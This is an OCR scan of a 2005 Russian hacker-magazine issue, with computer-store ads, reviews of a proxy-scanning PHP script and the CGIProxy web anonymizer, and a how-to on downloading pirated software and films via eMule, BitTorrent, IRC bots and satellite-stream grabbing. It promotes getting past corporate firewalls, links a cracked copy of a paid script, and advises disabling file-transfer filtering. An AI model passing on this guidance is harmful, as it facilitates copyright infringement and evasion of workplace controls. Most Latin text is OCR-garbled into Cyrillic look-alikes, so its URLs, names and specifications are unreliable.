Наследие тысячелетий 

в технологиях будущего. 



ѵтѵ/ТохсоппсЬаппеІ.сот 

ѵ/ѵ/ѵ/Тохсопп.ги 



МОТНЕНВОАНЮ 



Чипсет ІпіеІ 955Х; поддержка ОиаІ Соге СРЦ 
Р5В 1066/800 МН*; 

йиаі сЬаппеІ ООЯ2 533/667 х4 ОІММз ѵѵісИ ЕСС 
Р-АТА х 3, 5-АТАІІ х 4, 5-АТА х 4; 

РСІе х 1 6, Зх РСІех I; 

7. 1 сЬаппеІ, НАО; 

ОиаІ Вгоасісот СЬЕ І_АІЧІ; 

ІЕЕЕ 1 394Ь & 1394а (Ріге ѴѴіге); 
до 8 портов У5В 2.0 



Москва: Ргопеідгоир - (095) 789-3846; Шга Сотриіегз - (095) 775-7566; Инкотрейд - (095) 785-8659; Кит - (095) 777-6655; Компьютадор - (095) 274-7300; НИКС - (095) 974-3333; Полярис - (095) 755-5557; 
Альметьевск: Компьютерный мир - (8553) 25-38-29; Волгоград: ЮКК МТ - (8442) 49-19-20; Краснодар: Игрек - (8612) 210-98-50; Красноярск: КАПИТАЛ-СЕРВИС - (3912) 63-60-30; Курск: КомпьюЛэнд - (0712) 56-46-43; 
Курчатов: КомпьюЛэнд - (07131) 2-31-22; Липецк: Регард - (0742) 22-13-09; Набережные Челны: КЦ "Ыехі сотриіег" - (8552) 39-03-38; Нижнекамск: КЦ "Ыехі сотриіег" - (8555) 43-79-82; Нижний Новгород: АйТиОн - (8312) 74-85-90; 
ВИСТ-НН 000 - (8312) 78-48-78; Ником-Медиа (8312) 34-11-34; ЮСТ - (8312) 30-16-74; Новосибирск: ЗЕТ ИСК - (3832) 125-142; Новый Уренгой: Все для офиса - (34949) 5-55-55; Омск: ТНТ 000 - (3812) 36-82-42; 
Электронный рай - (3812) 51-04-04; Рязянь: Шга - (0912) 205-205; Самара: Прагма - (8462) 16-32-87; Саратов: АТТО - (8452) 444-111; Томск: Стек - (3822) 554-554; Улан-Удэ: Снежный Барс - (3012) 43-00-00, 43-55-15; 
Хабаровск: Диалог Плюс - (4212) 50-37-06; Дальком - (4212) - 42-86-72; Челябинск: Алиас - (3512) 37-8717; Чита: Вавилон - (3022) 32-55-00. 



А5ВІ5 

ѵѵѵѵѵѵ.а$Ьі$.ги 




Оіпа ѴІсіогіа 

ѵуѵлѵ.сіѵсотр.ги 



т^гііоп 



мЕкиом 

ѵѵѵѵѵ/.тегііоп.ги 




Тринити Лоджик 

ѵлѵѵ/.и-с.ги 




[хакер 09 [81] 05 > РС_20ЫЕ 036 ] 



[НТТР Ргоху Ріпсіег] 

Платформа: РНР 



Размер: 2 Кб 



Сайт: ѵѵѵѵѵѵ.кіпр.сот 



Прокси-листы, как было сказано выше, можно купить, но 
что делать, если с финансами напряги и спонсорской помо- 
щи не предвидится? В этом случае их можно попробовать 
найти самому. Самый верный способ — просканировать ди- 
апазон ІР-адресов и проверить каждый из них на открытые 
3128, 8080, 1080 порты, то есть те, на которых могут быть 
установлены прокси. Это можно сделать с помощью спе- 
циальной программы (ѵѵт /ѵ.зіауіпѵізіЫе.сот/іпсІех.рІ/зсап- 
піпд_зоііѵѵагё), но удобнее использовать РНР-скрипт. Он 
может работать круглосуточно, да и канал у хостера куда 
шире, чем у тебя дома. 

Скрипт, который реализует эту идею, имеет вполне банальное название 
— НТТР Ргоху Ріпсіег. Всего 2 Кб примитивного кода, но зато работает! 
Настраивать его не нужно: просто залей на хостинг и вызови через 
браузер. Выбрав начальный и конечный ІР-адреса для сканирования, 
жми на кнопку РіпсІ. Если ты указал довольно большой диапазон, скани- 
рование может сильно затянуться по времени, но, к счастью, разработ- 
чики догадались реализовать отображения результатов сканирования в 
реальном времени. 

Минуса у этой НТТР Ргоху Ріпсіег два. Во-первых, этот примитив разра- 
ботчики пытаются толкнуть за деньги, но это легко решается, так как до- 
брые люди давно выложили нуленую версию в инет — 
Ыір://зсгірІз . ѵѵтіга бег. сот/Н ТТР. Ргоху. Ріпсіег. РНР. ИІЛ . /_ -С(3 Т.гір. А во- 
вторых, в программе не реализована многопоточность, что коренным 
образом влияет на скорость сканирования. Если хочешь несколько по- 
токов, придется запускать несколько копий скрипта. А жаль... 





удобный интерфейс: 

все необходимое, как на ладони 




СѲІРгоху требует ввести адрес 
какого-нибудь сайта 



[ССІРгоху 2.0.1] 

Платформа: РегІ 



Размер: 92 Кб 



начать генерацию трафика 



Сайт: \л/\л/ѵѵ.]тагзІіаІІ.сотЛооІз/сдіргоху 
В последнее время все чаще и чаще на различ- 
ных варезных сайтах ссылки на загрузку фай- 
лов сопровождаются пометкой «только для 
российских ІР-адресов». Мне, как заядлому 
пользователю спутникового интернета, это 
очень не нравится, так как сервер заі-провай- 
дера стоит в Германии и ІР-адрес у меня, соот- 
ветственно, немецкий. Для решения проблемы 
можно было бы воспользоваться прокси-серве- 
ром, но, как оказалось, найти стабильный бы- 
стрый и бесплатный проксик не так уж и про- 
сто. Тогда-то мне и пришла идея воспользо- 
ваться скриптом-анониномайзером, установив 
его на быстром российском хостинге. По сути, это тот же самый прокси- 
сервер, но работающий через браузер. 

После нескольких экспериментов стало ясно, что подходящий скрипт, 
который отвечает всем моим требованиям, только один — СѲІРгоху. 
Установить его несложно. В самом простом случае нужно лишь распа- 
ковать архив и скопировать файл прП-ргоху.сді на сервер, установив че- 
рез РТР-клиент права на исполнение (сИтоб) 777. Можно поступить еще 
проще и воспользоваться специальным веб-установщиком — 
ѵѵѵѵуѵ.ха ѵ. сопп/сді-зуз/сдіжар/ха ѵ/іпзіаіі. сді?р=сді ргоху. После того, как 
установка завершена, набери адрес скрипта и любуйся результатом. 
Главное окно скрипта представляет собой текстовое поле для ввода ин- 
тернет-адреса, а также ряда опций, влияющих на серфинг. Все, что нуж- 
но для начала работы — набрать адрес нужного сайта или РТР-сервера 
и нажать Ведіп Ьгоѵѵзіпд. Сразу после этого появится окно с двумя фрей- 



серфинг инета через СѲІРгоху не 
вызывает дискомфорта. Все как 
обычно, за исключением фрейма 
для ввода адреса 



мами: в одном из них будет ото- 
бражаться выбранный веб-сайт, в 
другом — адресная строка, а так- 
же параметры серфинга. Серфинг 
происходит так, как если бы ты ра- 
ботал только с помощью браузера. 
С тем отличием, что адрес нового 
сайта нужно вводить не в адре- 
сной строке браузера, а в адре- 
сной строке СѲІРгоху. 

Ты в любой момент можешь пе- 
рейти по другому адресу, открыть 
через «прокси» новое окно, от- 
ключить использование соокіез 
или отредактировать уже имею- 
щиеся плюшки. Для обеспечения 
анонимности рекомендуется от- 
ключить поддержку скриптов (оп- 
ция Ыо зсгіріз), а также передачу 
твоих переменных окружения (оп- 
ция Ыо геіеггег). 

Сразу становится ясно, что проект 
СѲІРгоху развивается уже не пер- 
вый год — все продумано до мело- 
чей и работает безупречно. Нам в 
РАО уже несколько раз приходил 
вопрос о том, как можно обойти 
корпоративный файрвол и прокси- 
сервер, которые фильтруют все 
МРЗ, XXX и прочие развлекатель- 
ные сайты. Так вот, СѲІРгоху по- 
может не только скрыть настоящий ІР-адрес, но и обойти все подобные 
ограничения. Это достигается за счет того, что ссылки, по которым ты 
переходишь, особым образом кодируются: они не могут быть проанали- 
зированы софтом и поэтому фильтруются. 

Альтернатива: Роху (РНР, мѵіл /,зоигсеіогде.пеі/рго}есІз/роху), ЗВР (РНР, 
зоигсеіогде.пеі/рго]есіз/зЬр ) . 

[думай головой] Скрипты — это не панацея от всех бед. Их исполь- 
зование действительно нередко бывает эффективно, но оно оправдано 
далеко не всегда. Нужно трезво оценивать, когда лучше использовать 
скрипт, когда — программу, а когда — вообще сторонний сервис. Если 
бы мне нужно было позарез обеспечить себе анонимность, я бы не за 
что не стал использовать сдіргоху. Несмотря на отсутствие собственных 
логов, все обращения к нему «светятся» в логах веб-сервера © 
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Выбирая компьютер АдеМТ на базе процессора ІпІеГ Реп1іит®4 
с технологией НТ Вы оправдаете все ваши ожидания! 

Улучшенная производительность в мультимедийных приложениях. Расширенные возможности 
редактирования цифрового фото и видео. Непревзойденная скорость обработки музыки. И самое удивительное - 
возможность делать всё это одновременно благодаря процессору 1п1еГРепйипгГ4 с технологией НТ! 



Л/Г 




► 3-х летнее бесплатное обслуживание, включая год полной гарантии 
* бесплатное обслуживание на рабочем месте в Москве (в пределах МКАД) 



► 100% предпродажное тестирование 
» отличные характеристики для работы дома и в офисе 



сотриіег 



СЕТЬ КОМПЬЮТЕРНЫХ ЦЕНТРОВ РОІ.АКІ5 



Москва, м. Багратионовская, ТВК "Горбушкин Двор", пав.: Е2 - 14/15, Е2 - 1 1 (095)755-5513 

Москва, м. Братиславская, ул. Братиславская, д.1 б, стр.1 (095)237-8240 

Москва, м. Динамо, ул. 8 Марта, д.1 0, стр.1 (095)262-8039 

Москва, м. Дмитровская, ул. Башиловская, д.29/27 (095)678-5470 

Москва, м. Комсомольская, ун-г «Московский», 4 этаж, пав.: 27 (095)359-891 5 

Москва, м. Красносельская, ул. Краснопрудная, 22/24 (095)389-4622 

Москва, м. Красносельская, ул. Русаковская, д.2/1 (095)784-6385 

Москва, м. Люблино, ТК "Москва", 2 этаж, 1 линия (095)784-661 5 

Москва, м. Пл. Ильича, ул. Сергия Радонежского, 31 (095)935-8727 

Москва, м. Пражская, ТЦ "Электронный рай", пав.: 1 Б-47, 2В-1 4,1 В-1 8, ЗП-9к (095)129-1 119 

Москва, м. Профсоюзная, Нахимовский пр-т, 40 (095)91 6-5627 

Москва, м. Пушкинская, ул. Малая Дмитровка, 1/7 (095)973-1 1 33 

Москва, м. Савеловская, ВКЦ "Савеловский", ул. Сущевский Вал, д.5, пав.: 20-5,024 (095)730-1 549 

Москва, м. Савеловская, Сущевский вал, 5, стр. 20, ТК "Салют 5", пав.: К-5 (095)200-3060 

Москва, м. Савеловская, Сущевский Вал, 3/5 (095)264-1 333 

Москва, м. Сокол, Волоколамское ш., 2, в здании «ГИДРОПРОЕКТ» (095)797-8986 

Москва, м. Шаболовская, ул. Шаболовка, 20 (095)347-9638 

Москва, м. Щукинская, ул. Новощукинская д.7 (095)797-8064 



Санкт-Петербург, м. Новочеркасская, Новочеркасский пр-т, 51 (095)444-7636 

Санкт-Петербург, м. Пр.Просвещения, ТК "НОРД", 2-й этаж, пав.: 204 (81 2)331-6244 

Санкт-Петербург, м. Сенная, ТЦ "ПИК", 3 этаж, пав.:304 (81 2)449-2441 

Санкт-Петербург, м. Петроградская, Каменноостровский пр., д.45 (81 2)346-1 1 90 

Санкт-Петербург, м. Ладожская, ТК "НЕО", 3 этаж, пав.:52 (81 2)449-2348 

Воронеж, ул.Кольцовская, 82 (0732)72-7391 

Воронеж, ул.Кольцовская, 29 (0732)39-0252 

Екатеринбург, пр-т Ленина, 99 (343)375-3304 

Казань скоро!! 

Краснодар скоро!! 

Нижний Новгород, Пл. М. Горького, ул.Звездинка, 3 (8312)78-0357 

Нижний Новгород, м. Канавинская, ТЦ "Новая Эра", 1 этаж (8312)16-9787 

Ростов-на-Дону, пр-т Буденновский, 80 (863)292-4242 

Ростов-на-Дону, пр-т Буденновский, 9/46 (863)269-8558 

Ростов-на-Дону, Ворошиловский пр-т, д.1 2 (863)240-5353 

Самара скоро!! 

Интернет-магазин: ІтКр://5Мор.п1.ги (095)970-1939 

Интернет-магазин: ИіІр://5000.ги (095)363-9363 




рвліішті 



Логотипы N1 Сотриіег и Р0І-АРІ5 являются зарегистрированными знаками их владельцев. Іпіеі, Іпіеі Ію^о, Іпіеі Іпзісіе, Іпіеі Іпзісіе і-о^о, Репііит являются зарегистрированными торговыми знаками корпорации Іпіеі и ее дочерних компаний в США и других странах 

При покупке компьютера обратите внимание установлена ли лицензионная операционная система М іеговой® ѴѴІпсІо\/ѵ5®ХР. Только в этом случае РОЬАРІЗ может гарантировать надежность работы компьютеров. 



ТОВАР СЕРТИФИЦИРОВАН 




ЮНИТЫ КРЕАТИФФ КОДИНГ ІІЫІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20МЕ РЕНРШМ НЬЮСЫ 
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Качай — 
не перекачай 

В ПОСЛЕДНЕЕ ВРЕМЯ КАЧАТЬ ВАРЕЗ С НТТР/РТР 
СТАЛО НАМНОГО СЛОЖНЕЕ. СТОЯЩИЕ ВЕЩИ 
ВЫКЛАДЫВАЮТСЯ НЕ ЧАСТО, А ССЫЛКИ ДОХ- 
НУТ КАК МУХИ. ЕСЛИ ПРОЗЕВАЛ И НЕ УСПЕЛ 
СКАЧАТЬ ФИЛЬМ СРАЗУ, МОЖНО ПРО НЕГО 
ЗАБЫТЬ — ЗАВТРА ССЫЛКА БУДЕТ НЕРАБОЧЕЙ. 
МОДНАЯ НЫНЧЕ ФИШКА — ЗАЛИВАТЬ ФАЙЛЫ 
НА СПЕЦИАЛЬНЫЕ ФАЙЛО-ХРАНИЛИЩА 
(ѴѴѴѴѴѴ.ВАРЮЗНАВЕЮЕ, ѴѴѴѴѴѴ.ѴѴЕВРІЬЕ.СОМ И 
Т.П.) — НАЧИНАЕТ КОНКРЕТНО РАЗДРАЖАТЬ. 

В ОДНОМ МЕСТЕ ОГРАНИЧЕНИЕ ПО СКОРОСТИ, 
ВО ВТОРОМ — НА ОБЪЕМ, В ТРЕТЬЕМ — ВООБ- 
ЩЕ ЗАПРЕЩАЮТ КАЧАТЬ В ВЕЧЕРНЕЕ ВРЕМЯ. 

ДОСТАЛО! I Степан Ильин ака 51ер (зІер@геаІ.хакер.ш) 



Учимся правильно 
искать и скачивать 
вкусный варез 

[заставь осла работать] Решить, если не 
все, то, по крайней мере, многие подобные 
проблемы под силу Р2Р-сетям. По какой-то не- 
ведомой мне причине пиринговые сети не очень 
распространены в России, в то время как весь 
мир уже давно подсел на них и вполне успешно 
использует. С непривычки начать работать с 
Р2Р непросто, так как нужно осознать некото- 
рые принятые правила и специфику. Но мы пос- 
тараемся сделать так, чтобы этот процесс у те- 
бя прошел максимально безболезненно. 
Понятие «пиринговая (реаМо-реаг) сеть» под- 
разумевает, что пользователи общаются и пе- 
редают друг другу файлы напрямую, то есть 
без участия посредников. Чем больше в пирин- 
говой сети пользователей, тем лучше для всех. 
Если в сети будет всего 100 пользователей, то 
вероятность найти какой-то файл практически 
сводится к нулю. Если их будет миллион, файл 
ты найдешь практически стопроцентно. Такую 
возможность предоставляет, к примеру, сеть 
еЭ2к. Оригинальным клиентом для ее пользо- 
вания является е0опкеу2000 (ѵѵі/ѵі/ѵ.ес/ол- 
кеу2000.сот). Однако эта программа имеет 
весьма ограниченные возможности и вдобавок 
является платной, поэтому сейчас практически 
никем не используется. Зато огромную попу- 
лярность получил клиент еМиІе (тѵі /ѵ.етиіе- 
ргоіе&.пеі). Этот некоммерческий продукт с 
открытыми исходниками элементарно устанав- 
ливается, прост в использовании и предостав- 
ляет максимум функций. 

На установке я останавливаться не буду, там 
все просто как две копейки. Обычная схема: 
скачал, установил, запустил. Во время первого 
запуска тебя радужно встретит мастер наст- 
ройки. Первое, что от тебя потребуется, — ус- 
тановить ник. Обязательно припиши к нему 
суффикс (шз), иначе тебя не пустят на российс- 




кие серверы. Должно получиться примерно так: Зіер (шз). Желательно 
включить автозапуск программы, а также автоматическое подключение 
— чуть позже ты поймешь, для чего это нужно. В следующем окне мож- 
но обозначить используемые программой ТСР/ІЮР-порты. Рекомендую 
оставить эти значения по умолчанию и обязательно проследить, чтобы 
они не были заблокированы файрволом — это очень важно. «Тест пор- 
тов» проверит корректность настроек. Не забудь также правильно обоз- 
начить скорости на прием и отдачу, не забывая, что другим приложени- 
ям тоже нужна свободная полоса. 

[проба сил] Для начала работы к этим самым пиринговым сетям необ- 
ходимо подключиться. Подключиться к сети Каб (пиринговая сеть, кото- 
рую также поддерживает еМиІе) предельно просто: в одноименном разде- 
ле есть кнопка «Самонастройка», которая сделает все за тебя. В случае 
с е02к все немного сложнее, так как для работы в этой сети требуется 
специальный сервер. Он не участвует в процессе передачи файлов, но за- 
то координирует работу клиентов и осуществляет поиск файлов. Каким 
бы медленным не был сервер, скорость передачи данных от него зави- 
сеть не будет. Список работающих серверов включен в состав в еМиІе по 
умолчанию, но его легко можно дополнить. Чем больше серверов будет в 
списке, тем шире будет диапазон поиска, и тем больше подходящих фай- 
лов будет найдено. Список серверов можно экспортировать из специаль- 
ного файла зегѵег.теі, свежую версию которого можно скачать, напри- 
мер, с есІ2к.2х4и.сІе. При желании, конкретные серверы (смотри сноску) 
можно добавить вручную, указав их ІР-адреса и порты. Хотя все это де- 
лать необязательно, так как еМиІе автоматически обновляет список, ис- 
пользуя информацию от других пользователей и серверов. Просто выби- 
рай сервер с большим количеством пользователей и подключайся к нему. 
Каждый раз, когда ты подсоединяешься к серверу, тебе выдается так 
называемый Ю — идентификационный номер, который зависит от тво- 
его ІР-адреса. Он сопровождается пометкой НідІіЮ или І_оѵѵЮ. Первое 
означает, что твое соединение позволяет полноценно работать в еЭ2к- 
сети. Что касается І_оѵѵЮ, то этот вариант нежелателен. Обычно такой 
статус получают те пользователи, к которым нельзя подключиться нап- 
рямую из-за использования прокси, ІМАТ'а, неправильной работы марш- 
рутизатора и т.д. Получив І_оѵѵЮ, ты не сможешь обмениваться файла- 
ми с пользователями, которые также имеют этот статус. Но это еще пол- 
беды. Некоторые клиенты (модификации еМиІе, например) полностью 
игнорируют таких пользователей или намеренно ограничивают их воз- 
можности по скачке. 

Так или иначе, ты подключен. Что делать дальше? Принцип обмена фай- 
лами очевиден. Ты можешь скачать то, что открыто у других пользовате- 
лей, они же в свою очередь имеют доступ к тому, что расшарено у тебя. 
Для того, чтобы скачать какой-то файл, его предварительно нужно найти 
(раздел еМиІе «Поиск»). В самом простом случае достаточно указать 
часть его названия в графе «Имя». Если же требуется провести более 




точный поиск, ты вправе указать тип желаемого файла, его макси- 
мальный и минимальный размер и прочие параметры. Поиск нуж- 
но осуществлять по всем серверам сразу — этот способ называет- 
ся «Глобальным» и установлен по умолчанию. Примерно через ми- 
нуту поиск, скорее всего, будет окончен, и ты увидишь результаты. 
Во время изучения результатов особое внимание нужно обратить 
на поля «Доступность» и «Полные источники». Первая показывает 
количество пользователей, у которых затребованный файл имеет- 
ся хотя бы частично, вторая показывает процент тех, которые име- 
ют его полностью. Выбирай тот файл, который имеет максималь- 
ное количество источников — желательно, чтобы их было не ме- 
нее 5 — 7. Чем больше источников одновременно отдают файл (он 
передается частями), тем быстрее у тебя будет суммарная ско- 
рость закачки. Кстати говоря, если в результатах поиска будет 
несколько файлов с одинаковыми названиями, знай — эти файлы 
различны. Уникальность файла определяется не по имени и не по 
размеру, а по ІѴЮ4-хэшу, который генерируется для каждого фай- 
ла в момент его «расшаривания». 

[а почему не качает?] Ну вот, файлы найдены и поставлены на 
закачку. Только вот незадача: файлы почему-то качаются очень 
медленно, а некоторые не качаются вообще. Именно из-за этой 
проблемы многие новички и забивают на Р2Р-программы, даже не 
разобравшись, в чем была проблема. В действительности все это 
закономерно. В данной пиринговой сети существует такое поня- 
тие, как очередь. Если в разделе «Передачи» дважды кликнуть по 
названию запрошенного файла, ты получишь подробную инфор- 
мацию обо всех его источниках. Для каждого источника в графе 
«Приоритет» будет обозначен особый параметр ОВ. Значение это- 
го параметра определяет твое положение в очереди. Чем оно 
меньше, тем быстрее начнется закачка. Ошибочно думать, что эта 
очередь продвигается, как в магазине. Твой ОВ напрямую зависит 
от того рейтинга, который ты имеешь у данного конкретного источ- 
ника. В еЭ2к не существует глобального рейтинга, но зато еМиІе 
считает рейтинг всех пользователей, у которых ты что-то скачал 
или которые что-то скачали у тебя. Это значит, что твой рейтинг у 



каждого пользователя различен. Если я закачаю Бублику 10 Мб свежей порну- 
хи (не, ну 10 Мб — это не серьезно. У меня ее и так 23 Гб — Прим. Бублика), 
мой рейтинг у него подрастет, и я смогу комфортно скачивать у него файлы. Но 
вместе с тем мой рейтинг у Куттера остается неизменным, так как ему я ниче- 
го не отдал. Правило простое: чем больше ты отдал — тем выше рейтинг. Это 
действует везде. Но возникает вопрос: каким образом каждый пользователь 




НАДЁЖНОСТЬ 
СТАНОВИТСЯ ДОСТУПНЕ 
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Скачав файлы, обязатель- 
но проверь их антивиру- 
сом. Иначе ты серьезно 
рискуешь подцепить ка- 
кую-нибудь неприятную 
заразу, которая быстро 
утащит у тебя пароль к 
аське, ключи для шеЬ- 
гпопеу и т.д. 




В список 
используемых 
еМиІе' ом серверов 
неплохо было бы 
добавить: 

217.106.18.150:4661 

217.106.18.217:4661 

207.44.222.47:4661 

207.44.206.27:9090 
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список серверов: выбираем самый посещаемый 




[сказка о ВіІТоггепІ] Рассказывая о способах поиска вареза, я не 
могу не рассказать о Р2Р-сети — ВіІТоггепІ. Эта пиринговая сеть в пос- 
леднее время завоевала прямо-таки огромную популярность, и во мно- 
гих ситуациях ее использовать даже удобнее, чем еЭ2к. Большой плюс 
ВіІТоггепІ заключается в том, что пользователь, скачивающий к себе ка- 
кие-либо данные, одновременно является их распространителем. Ска- 
чав одну часть файла, ты сразу же становишься ее источником, но вмес- 
те с тем продолжаешь выкачивать все остальные части. Этому правилу 
подчиняются все пользователи ВіІТоггепІ. Получается, что чем больше 
людей участвует в раздаче конкретного файла, тем выше скорость по- 
лучит каждый из них. 

В отличие от еЭ2к, для работы с ВіІТоггепІ существует очень много раз- 
личных клиентов (в этом нет ничего удивительного, так как протокол от- 
лично документирован). Хорошо зарекомендовали себя программы 
Агигеиз (, агигеиз.зоигсеіогде.пеі ) и ВіЮотеІ (илллл /.Ьіісотеі.сот). Я ис- 
пользую вторую и полностью ей доволен — работает стабильно, качает 
быстро, плюс ко всему прочему — проста как две копейки. Никаких под- 
водных камней, как в случае с еМиІе'ом и вообще сетью еЭ2к, здесь нет. 
Просто поставил клиента, установил в настройках максимальные ско- 
рости на прием и отдачу, и можешь приступать к работе. 

Передача файлов через ВіІТоггепІ осуществляется с помощью специ- 
альных файлов-идентификаторов — торрентов, которые содержат не- 
обходимую информацию о запрашиваемом файле (или файлах): его 
размер, хэш, количество фрагментов и т.д. Помимо этого торренты со- 
держат адрес специального сервера, так называемого трекера, который 
будет руководить процессом передачи. Обратившись к трекеру, клиент 
получает информацию о тех людях, которые в данный момент передают 
запрошенный файл, подключается к ним и начинает закачку. Схема 
непростая, но зато позволяет наладить эффективную раздачу файлов 
между пользователями сети. 

Итак, для того, чтобы скачать какой-нибудь файл, необходимо найти Іог- 
гепі, который описывает его. Нет ничего проще! В Сети доступно множе- 
ство специализированных ресурсов, на которых ежедневно выкладыва- 
ются сотни Іогтепі'ов. Во врезке я привел наиболее популярные сервисы, 
который публикуют Іоггепі'ы для самых новых фильмов, музыки, вареза 
и т.п. Помимо этого список популярных ресурсов есть и в самом клиен- 
те ВіІСотеІ. Просто скачай Іогтепі-файл, скорми его своему клиенту и 
наслаждайся высокой скоростью закачки. 

Эффективность: если хочешь скачать свежий фильм, музыкальный аль- 
бом или последнюю версию ѴѴіпбоѵѵз Ѵізіа (ака І_опдПогп), ВіІТоггепІ — 



это именно то, что надо. Популярные файлы качаются с огромной ско- 
ростью, при этом не надо заморачиваться по поводу рейтингов и т.п. В 
то же время, найти и скачать уникальный и редкий файл практически 
невозможно. 

[Ирина — наш друг и помощник] Хорошая альтернатива пиринго- 
вым сетям — ІВС. Множество людей, так или иначе связанных с ѵѵагег- 
соттипііу, тусуются и общаются на I ВС-каналах, попутно выкладывая 
свои свежие релизы. Если ты никогда не пробовал искать здесь «све- 
жак», считай, что многое потерял. Открою тебе секрет: это самый нас- 
тоящий неиссякаемый источник вареза. Получить к нему доступ может 
каждый желающий — нужен лишь рабочий ІВС-клиент. На мой взгляд, 
выбор клиента очевиден: со всеми задачами на ура справляется ста- 
рый-добрый тІВС ( ѵѵѵѵѵѵ.тігс.сот ). Необходимости в тонкой настройке 
нет. Единственное, на что стоит обратить внимание, — опции ЭСС. Зай- 
ди в меню Тооіз Орііопз ЭСС -» Ідпоге и в поле МеіІіосІ выбери 
ЭізаЫесІ. Тем самым ты отключишь фильтрацию входящих файлов, ко- 
торая по большей части только мешается. 

Пару слов о том, каким образом раздаются файлы через ІВС. В каждой 
сети существуют ѵѵагег-каналы, отличительная особенность которых, — 
куча народа. Помимо обычных смертных, таких, как ты или я, на канале 
находятся боты. Однако это не те боты, которые ЭоЗ'ят удаленный сер- 
вис или совершают другие нехорошие вещи. Это хорошие боты, в зада- 
чи которых входит раздача файлов. Общение с ботами происходит с по- 
мощью специальных команд-триггеров, на которые он реагирует и вы- 
полняет требуемое действие. 

Выходит, что для поиска и закачки файлов с ІВС нужно лишь найти под- 
ходящий канал. Тут сложно дать какие-то конкретные рекомендации, 
так как любой бот раздает только определенный тип файлов. Один — 
музыку, другой — фильмы и т.д. Если тебе не удалось найти название 
нужных каналов через доодіе, придется действовать наобум. Как бы 
странно это ни казалось, но выходит обычно хорошо. Даже очень. 
Алгоритм простой: сначала выбираешь из списка любую из сетей (нап- 
ример, ІІпсІегпеІ) и подключаешься к ней. Далее с помощью команды, 
отображающей список каналов, запрашиваешь список тех, которые в 
названии содержат слова ѵѵагег, Іііт, трЗ, ехріоіі и т.д. Это делается 
примерно так: /Іізі *ѵѵагег*. Немного подумав, сервер возвратит резуль- 
тат. Выбирай самые посещаемые каналы и заходи на них. Мой совет: 
первым делом внимательно прочитай топик — в нем обычно обозначе- 
ны краткие правила использования канала, а также доступные коман- 



ТРЕКЕРЫ ДЛЯ ВІТТОВВЕІЧТ 

Среди бесплатных трекеров хочется выделить: 

Шр://реегз . ік/Ьго ѵѵзе .ріір 

уѵуѵуѵ. гизсііѵх. ее/іЫ 

Ыір://коѵ4ед.пеі 

ѵѵѵѵѵѵ.кіпогаі.сот 

Ыір://іоггепі.е2к.ги 

Мір://іоггепіз.ги:6969 

Мір://кіпозІіага.сот 



ѵѵѵѵѵѵ .росіѵаі .ее 
Шр://кіпо 2 .а!. сот 
Шр://ІоггепІ.ІароізоН.сот 
Ыір://етрогпіит . из 

Существуют также приватные трекеры, свободный доступ 
к которым закрыт. Я намеренно не публикую ссылки, что- 
бы их не завалили ничем не подкрепленными просьбами 
о членстве. Доступ нужно заслужить: прояви фантазию, 
и все получится. 
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Интернет-техника 
для дома 



Модемы 

АР5І_ 




Чтобы подключиться к Интернету через 
АйЗІ_ на скорости в 500 раз быстрее 
самого крутого ОіаІ-ІІр-модема, 
достаточно обычной телефонной линии 
никаких дырок в стенах, никаких новых 
проводов. Нужно лишь, чтобы на вашей 
АТС был АЭЗЬпровайдер, а у вас — 
специальный модем, который сам 
сконфигурирует подключение 



Модем А05І-2+ Модем АЭЗІ-2+ с 4-портовым 
с портом ЕШегпеІ коммутатором, беспроводной 
р-ббокЕЕ точкой доступа 802.1 1д+ 

и межсетевым экраном 

Р-660НѴѴ ЕЕ 



Модем А03І_ 
с портом ІІЗВ 

ОММ А08І. 115В ЕЕ 



и уже через три минуты после подачи 
питания соединит вас с Интернетом 
на сумасшедшей скорости. 

И самое приятное — ваша телефонная 
линия всегда остается свободной для 
обычных телефонных звонков. 




ОМІЧІ— твой сетевой друг 













Смотрите новые приключения 
Масяни на нашем сайте: 



ОМІ\ІІ.2уХЕІ_.ВІІ 



ТОВАР СЕРТИФИЦИРОВАН 
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список подходящих ІРС-каналов после команды /Іізі *ѵѵагѳ 2 * 




настройки ВіЮотеІ можно оставить без изменений - все 
будет работать и без твоей помощи 



ды. В противном случае ты серьезно рискуешь отхватить вечный бан. 
Наиболее распространенными триггерами являются Шзі, Мпеір, !1іп<± Это 
обычные сообщения, которые отправляются на канал. Первая выводит 
список доступных файлов, вторая — краткую справку по использова- 
нию, третья используется для поиска конкретного файла. Команды мо- 
гут различаться в зависимости от софта, используемого ботом, поэтому 
внимательно читай справку, и скачать файлы не составит труда. 
Описанный способ поиска файлов, безусловно, эффективен, однако не 
очень удобен, так как множество работы приходится выполнять вруч- 
ную. Автоматизировать этот процесс способны специальные поисковые 
сервисы, которые отслеживают огромное количество ботов. Выглядят 
они как обычный поисковик: заходи и вводи имя файла в графе поиска. 
Наиболее популярными ІВС-поисковиками являются: 
уѵуѵуѵ. раскеіпеѵѵз. сот 
уѵуѵуѵ .хсіссзру . сот 
уѵуѵуѵ. ігсзру. сот 
уѵуѵуѵ. хдссзеагсіп . сот 

Для тех, кому работа с ботами с помощью обычного тІВС кажется че- 
ресчур неудобной, рекомендую попробовать специальный скрипт 
Аиіодеі (уѵуѵуѵ. отепзсгіріз.огд/аиіодеі). Он полностью берет на себя зада- 
чи по работе с хООС и вполне успешно избавляет от лишнего геморроя. 
Эффективность: способ, конечно, не из самых удобных, но зато эффек- 
тивный. Свежий варез здесь есть всегда — это большой плюс. Однако 
редкие файлы искать даже не пробуй. 

[а зачем нам интернет?] Каждый мечтает, чтобы свежий варез ва- 
лился к нему на компьютер сам. Чтобы не нужно было лопатить кучу ва- 
резных сайтов, заморачиваться с ІВС и Р2Р, а еще лучше — даже не вы- 
ходить в интернет. Ты думаешь, это невозможно? Ты ошибаешься! 

На самом деле это вполне реально, но лишь с одним условием — у те- 
бя должен быть установлен комплект спутникового оборудования. 
Обычная спутниковая тарелка умеет только принимать информацию, 
поэтому большинство спутниковых провайдеров работают по асинхрон- 
ной технологии. Для использования интернета пользователю приходит- 
ся юзать так называемый обратный канал, по которому он отправляет 
все необходимые данные, в том числе и запросы на загрузку страничек, 
файлов и т.п. Все запрошенные файлы, веб-страницы и прочее в свою 
очередь отсылаются ему по спутнику. Хорошая система, но здесь есть 
один нюанс: поток данных со спутника одинаков для всех. Это значит, 



что файлы, запрошенные одним пользователем, могут принять и все ос- 
тальные. На этом утверждении и основан алгоритм чудо-программы 
ЗкуІМеІіх (Ыір://еопіпІо.кіеѵ. иа/кІез.зМтІ) . 

ЗкуЫеІіх — это так называемый файловых граббер, в задачу которого 
входит считывание спутникового потока и изъятие оттуда нужных тебе 
